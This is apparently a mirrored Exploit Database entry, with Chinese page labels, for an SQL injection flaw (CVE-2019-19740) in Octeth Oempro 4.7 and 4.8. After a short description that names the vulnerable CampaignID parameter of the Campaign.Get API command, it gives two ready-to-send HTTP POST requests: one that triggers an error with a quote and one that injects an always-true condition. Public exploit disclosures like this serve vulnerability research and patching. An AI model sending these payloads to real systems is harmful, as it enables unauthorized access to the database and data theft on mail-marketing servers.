Octeth Oempro 4.8 – ‘CampaignID’ SQL Injection

• Exploit Database
• 104 阅读

• 作者： Bruno de Barros Bulle
  日期： 2020-01-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47967/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  # Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection # Date: 2020-01-27 # Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br) # Vendor Homepage: www2.octeth.com # Version: Octeth Oempro v.4.7 and v.4.8 # Tested on: Oempro v.4.7 # CVE : CVE-2019-19740     An authenticated user can easily exploit this vulnerability. Octeth Oempro 4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get is vulnerable.   # Error condition POST /api.php HTTP/1.1 Host: 127.0.0.1   command=Campaign.Get&CampaignID=2019'&responseformat=JSON   # SQL Injection exploitation POST /api.php HTTP/1.1 Host: 127.0.0.1   command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON